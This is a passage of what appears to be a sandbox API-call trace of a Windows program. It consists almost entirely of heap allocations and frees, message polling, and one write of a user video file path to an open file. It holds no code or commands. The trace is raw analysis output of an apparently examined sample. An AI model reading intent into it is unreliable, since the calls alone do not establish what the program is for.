lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0192.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0192.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\n", cchWideChar=80, lpMultiByteStr=0x9238c0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 80 [0192.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0192.072] WriteFile (in: hFile=0x160, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0192.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.072] CloseHandle (hObject=0x160) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.080] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0192.080] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.082] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0192.082] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.082] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.082] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.083] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0192.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0192.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.086] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.089] 